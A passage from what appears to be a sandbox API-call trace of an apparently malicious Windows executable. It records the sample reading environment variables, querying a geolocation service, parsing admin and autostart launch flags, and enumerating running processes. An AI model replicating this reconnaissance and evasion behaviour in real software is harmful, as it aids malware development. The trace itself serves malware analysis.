lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0163.629] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x17) returned 0x280d70 [0163.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x280d70, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBLIC=C:\\Users\\Public", lpUsedDefaultChar=0x0) returned 23 [0163.629] GetLastError () returned 0x0 [0163.629] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280e30, Size=0x70) returned 0x280e30 [0163.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0163.629] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0xf) returned 0x27e9c0 [0163.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x27e9c0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemDrive=C:", lpUsedDefaultChar=0x0) returned 15 [0163.629] GetLastError () returned 0x0 [0163.630] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280e30, Size=0x74) returned 0x280e30 [0163.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0163.630] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x16) returned 0x280d90 [0163.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x280d90, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemRoot=C:\\Windows", lpUsedDefaultChar=0x0) returned 22 [0163.630] GetLastError () returned 0x0 [0163.630] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280e30, Size=0x78) returned 0x280e30 [0163.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0163.630] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x2a) returned 0x27b3d0 [0163.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x27b3d0, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 42 [0163.630] GetLastError () returned 0x0 [0163.630] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280e30, Size=0x7c) returned 0x280e30 [0163.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0163.630] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x29) returned 0x27b408 [0163.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x27b408, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 41 [0163.630] GetLastError () returned 0x0 [0163.630] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280e30, Size=0x80) returned 0x280e30 [0163.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0163.630] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x15) returned 0x280eb8 [0163.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x280eb8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERDOMAIN=XDUWTFONO", lpUsedDefaultChar=0x0) returned 21 [0163.630] GetLastError () returned 0x0 [0163.631] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280e30, Size=0x84) returned 0x280ed8 [0163.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0163.631] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x1e) returned 0x27f480 [0163.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x27f480, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERNAME=5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 30 [0163.631] GetLastError () returned 0x0 [0163.631] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280ed8, Size=0x88) returned 0x280ed8 [0163.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0163.631] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x2a) returned 0x27b440 [0163.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x27b440, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 42 [0163.631] GetLastError () returned 0x0 [0163.631] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280ed8, Size=0x8c) returned 0x280ed8 [0163.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0163.631] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x12) returned 0x280e30 [0163.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x280e30, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windir=C:\\Windows", lpUsedDefaultChar=0x0) returned 18 [0163.631] GetLastError () returned 0x0 [0163.631] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280ed8, Size=0x90) returned 0x280ed8 [0163.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0163.631] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x18) returned 0x280e50 [0163.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x280e50, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_flags=3", lpUsedDefaultChar=0x0) returned 24 [0163.631] GetLastError () returned 0x0 [0163.631] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280ed8, Size=0x94) returned 0x280ed8 [0163.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0163.631] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x46) returned 0x276ed8 [0163.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x276ed8, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", lpUsedDefaultChar=0x0) returned 70 [0163.632] GetLastError () returned 0x0 [0163.632] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280ed8, Size=0x98) returned 0x280ed8 [0163.642] GetLastError () returned 0x0 [0163.697] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x280960) returned 0x80 [0163.698] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x280960) returned 0x80 [0163.698] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x280960) returned 0x80 [0163.716] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x8ec) returned 0x281fe8 [0163.778] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x280960) returned 0x80 [0163.778] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x10) returned 0x27e9d8 [0163.779] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x280960) returned 0x80 [0163.780] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x280960) returned 0x80 [0163.780] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x280960) returned 0x80 [0163.829] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x280960) returned 0x80 [0163.840] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0164.018] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x275da8 [0164.018] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="https://api.2ip.ua/geo.json", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0165.035] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x18ace0, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x18d4e0 | out: lpBuffer=0x18ace0*, lpdwNumberOfBytesRead=0x18d4e0*=0x1d0) returned 1 [0165.037] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0165.040] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0165.040] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x28da20 [0165.050] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1e0) returned 0x319cd18 [0165.070] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x319cd18 | out: hHeap=0x260000) returned 1 [0165.079] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x28da20 | out: hHeap=0x260000) returned 1 [0165.079] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x275da8 | out: hHeap=0x260000) returned 1 [0165.079] GetCurrentProcess () returned 0xffffffff [0165.079] GetLastError () returned 0x2 [0165.079] SetPriorityClass (hProcess=0xffffffff, dwPriorityClass=0x80) returned 1 [0165.089] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x10) returned 0x2b1b00 [0165.089] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x8ec) returned 0x31b11f8 [0165.118] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x800) returned 0x2b24b0 [0165.118] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2b24b0, nSize=0x400 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cusersabdoappdatalocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75fceb.tmp.exe")) returned 0x6c [0165.118] PathRemoveFileSpecW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0165.129] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x810) returned 0x31b1af0 [0165.129] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe\" --Admin IsNotAutoStart IsNotTask" [0165.129] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe\" --Admin IsNotAutoStart IsNotTask", pNumArgs=0x18d5c0 | out: pNumArgs=0x18d5c0) returned 0x3176fe8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe" [0165.129] lstrcpyW (in: lpString1=0x18e250, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe" [0165.129] lstrcmpW (lpString1="IsAutoStart", lpString2="IsNotAutoStart") returned -1 [0165.129] lstrcmpW (lpString1="IsTask", lpString2="IsNotTask") returned 1 [0165.140] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe\" --Admin IsNotAutoStart IsNotTask" [0165.140] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe\" --Admin IsNotAutoStart IsNotTask", pNumArgs=0x18d55c | out: pNumArgs=0x18d55c) returned 0x3176fe8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe" [0165.140] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe") returned="CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe" [0165.140] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0165.141] GetProcAddress (hModule=0x76d30000, lpProcName="EnumProcesses") returned 0x0 [0165.141] GetProcAddress (hModule=0x76d30000, lpProcName="EnumProcessModules") returned 0x0 [0165.141] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleBaseNameW") returned 0x0 [0165.141] LoadLibraryW (lpLibFileName="Psapi.dll") returned 0x77060000 [0165.201] GetProcAddress (hModule=0x77060000, lpProcName="EnumProcesses") returned 0x77061544 [0165.201] GetProcAddress (hModule=0x77060000, lpProcName="EnumProcessModules") returned 0x77061408 [0165.202] GetProcAddress (hModule=0x77060000, lpProcName="GetModuleBaseNameW") returned 0x7706152c [0165.202] EnumProcesses (in: lpidProcess=0x182d58, cb=0xa000, lpcbNeeded=0x18d568 | out: lpidProcess=0x182d58, lpcbNeeded=0x18d568) returned 1 [0165.206] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0165.206] CloseHandle (hObject=0x0) returned 0 [0165.207] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0165.207] CloseHandle (hObject=0x0) returned 0 [0165.207] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0165.207] CloseHandle (hObject=0x0) returned 0 [0165.207] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0165.207] CloseHandle (hObject=0x0) returned 0 [0165.207] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0165.207] CloseHandle (hObject=0x0) returned 0 [0165.207] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0165.207] CloseHandle (hObject=0x0) returned 0 [0165.207] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0165.207] CloseHandle (hObject=0x0) returned 0 [0165.207] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0165.207] CloseHandle (hObject=0x0) returned 0 [0165.207] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0165.207] CloseHandle (hObject=0x0) returned 0 [0165.208] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0165.208] CloseHandle (hObject=0x0) returned 0 [0165.208] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x250) returned 0x0 [0165.208] CloseHandle (hObject=0x0) returned 0 [0165.208] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0165.208] CloseHandle (hObject=0x0) returned 0 [0165.208] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0165.208] CloseHandle (hObject=0x0) returned 0 [0165.208] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x338) returned 0x0 [0165.208] CloseHandle (hObject=0x0) returned 0 [0165.208] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x370) returned 0x0 [0165.208] CloseHandle (hObject=0x0) returned 0 [0165.208] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0 [0165.208] CloseHandle (hObject=0x0) returned 0 [0165.208] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc8) returned 0x0 [0165.208] CloseHandle (hObject=0x0) returned 0 [0165.209] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x11c) returned 0x0 [0165.209] CloseHandle (hObject=0x0) returned 0 [0165.209] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x444) returned 0x5a4 [0165.209] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 0 [0165.209] CloseHandle (hObject=0x5a4) returned 1 [0165.209] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x454) returned 0x5a4 [0165.209] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 0 [0165.209] CloseHandle (hObject=0x5a4) returned 1 [0165.209] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x47c) returned 0x0 [0165.209] CloseHandle (hObject=0x0) returned 0 [0165.209] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4bc) returned 0x0 [0165.209] CloseHandle (hObject=0x0) returned 0 [0165.210] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0165.210] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 0 [0165.210] CloseHandle (hObject=0x5a4) returned 1 [0165.210] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x588) returned 0x5a4 [0165.210] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 0 [0165.210] CloseHandle (hObject=0x5a4) returned 1 [0165.210] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x670) returned 0x5a4 [0165.210] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.212] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xeb0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="red-shadows-rotary.exe") returned 0x16 [0165.212] CloseHandle (hObject=0x5a4) returned 1 [0165.212] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x32c) returned 0x5a4 [0165.212] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.213] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x900000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="eagle warm.exe") returned 0xe [0165.214] CloseHandle (hObject=0x5a4) returned 1 [0165.214] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6a4) returned 0x5a4 [0165.214] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.215] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x3b0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="mph-closes-case.exe") returned 0x13 [0165.216] CloseHandle (hObject=0x5a4) returned 1 [0165.216] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x730) returned 0x5a4 [0165.216] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.217] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xa80000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="attorney-device-baghdad.exe") returned 0x1b [0165.218] CloseHandle (hObject=0x5a4) returned 1 [0165.218] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x78c) returned 0x5a4 [0165.218] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.219] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x800000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="pack implies.exe") returned 0x10 [0165.220] CloseHandle (hObject=0x5a4) returned 1 [0165.220] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x60c) returned 0x5a4 [0165.220] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.221] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xea0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="sierra promotion.exe") returned 0x14 [0165.222] CloseHandle (hObject=0x5a4) returned 1 [0165.222] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x20c) returned 0x5a4 [0165.222] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.223] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x2b0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="border_bandwidth.exe") returned 0x14 [0165.224] CloseHandle (hObject=0x5a4) returned 1 [0165.224] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x244) returned 0x5a4 [0165.224] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.225] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1210000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="releases.exe") returned 0xc [0165.226] CloseHandle (hObject=0x5a4) returned 1 [0165.226] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7a0) returned 0x5a4 [0165.226] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.227] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x2f0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="murray_indicate.exe") returned 0x13 [0165.228] CloseHandle (hObject=0x5a4) returned 1 [0165.228] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x174) returned 0x5a4 [0165.228] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.229] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xef0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="scientific_baltimore_enter.exe") returned 0x1e [0165.230] CloseHandle (hObject=0x5a4) returned 1 [0165.230] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x788) returned 0x5a4 [0165.230] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.231] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x9b0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="brands-shoes.exe") returned 0x10 [0165.232] CloseHandle (hObject=0x5a4) returned 1 [0165.232] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7e8) returned 0x5a4 [0165.232] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.233] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xd60000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="interstate-exposed.exe") returned 0x16 [0165.234] CloseHandle (hObject=0x5a4) returned 1 [0165.234] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x48c) returned 0x5a4 [0165.234] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | 